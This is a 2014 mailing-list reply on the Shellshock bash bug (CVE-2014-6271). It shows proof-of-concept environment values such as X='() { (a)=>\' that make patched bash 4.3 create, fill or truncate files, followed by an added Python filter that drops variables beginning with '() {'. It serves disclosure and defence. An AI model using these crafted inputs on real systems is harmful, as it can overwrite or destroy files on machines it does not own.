Re: Bash-4.3 Official Patch 25
From: Ángel González
Subject: Re: Bash-4.3 Official Patch 25
Date: Thu, 25 Sep 2014 00:44:22 +0200

Eric Blake wrote:
> https://bugzilla.redhat.com/show_bug.cgi?id=1141597 describes this bug
> (aka CVE-2014-6271), and points out that even _with_ this patch, there
> is still a flaw that attackers can use to overwrite portions of the
> filesystem, which is also a possible exploitation avenue:
>
> $ ls -l date
> ls: cannot access date: No such file or directory
> $ env -i X='() { (a)=>\' bash -c 'date'
> bash: X: line 1: syntax error near unexpected token `='
> bash: X: line 1: `'
> bash: error importing function definition for `X'
> $ ls -l date
> -rw-------. 1 taviso taviso 0 Sep 24 14:06 date

It doesn't just create 0-sized files:

$ echo "{ echo 'Hello World' }" > foo.sh
$ VAR='() { (a) =>\' bash foo.sh
bash: VAR: line 1: syntax error near unexpected token `='
bash: VAR: line 1: `'
bash: error importing function definition for `VAR'
$ cat {
Hello World }

OTOH, had we used bash -c foo.sh, it would have removed the script
contents (truncated to 0 bytes).
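
Added example, not part of the original message or of bash itself: a defensive filter that parses a NUL-separated environment block (the /proc/<pid>/environ layout) and drops every variable whose value starts with `() {`, the prefix that makes bash 4.3 attempt the function import seen in both sessions above. The function names and the sample block are assumptions made for illustration.

```python
# Added example: scrub function-import-shaped variables before bash is started.
# bash 4.3 tries to import a function from any variable whose value begins
# with these four characters, which is the code path both sessions trigger.
FUNC_PREFIX = "() {"


def parse_environ_block(block):
    """Parse a NUL-separated environment block into a dict of str -> str."""
    env = {}
    for entry in block.split(b"\0"):
        name, sep, value = entry.partition(b"=")
        if not sep or not name:
            continue  # skip the empty trailing entry and malformed items
        env[name.decode("utf-8", "replace")] = value.decode("utf-8", "replace")
    return env


def scrub_function_imports(env):
    """Return (clean_env, findings); findings lists the dropped (name, value) pairs."""
    clean, findings = {}, []
    for name, value in env.items():
        if value.startswith(FUNC_PREFIX):
            findings.append((name, value))  # bash would try to parse this value
        else:
            clean[name] = value
    return clean, findings


# Constructed sample block. X and VAR carry the values shown in the thread;
# NOTE contains "() {" mid-string only, so bash never treats it as a function.
SAMPLE_BLOCK = (
    b"PATH=/usr/bin:/bin\0"
    b"X=() { (a)=>\\\0"
    b"VAR=() { (a) =>\\\0"
    b"NOTE=see f() { :; } in docs\0"
    b"\0"
)

if __name__ == "__main__":
    clean, findings = scrub_function_imports(parse_environ_block(SAMPLE_BLOCK))
    for name, value in findings:
        print(f"dropped {name}={value!r}")
    print("kept:", sorted(clean))
```

The cleaned dict can be handed to `subprocess.run(..., env=clean)` so that a child bash never sees the dropped variables.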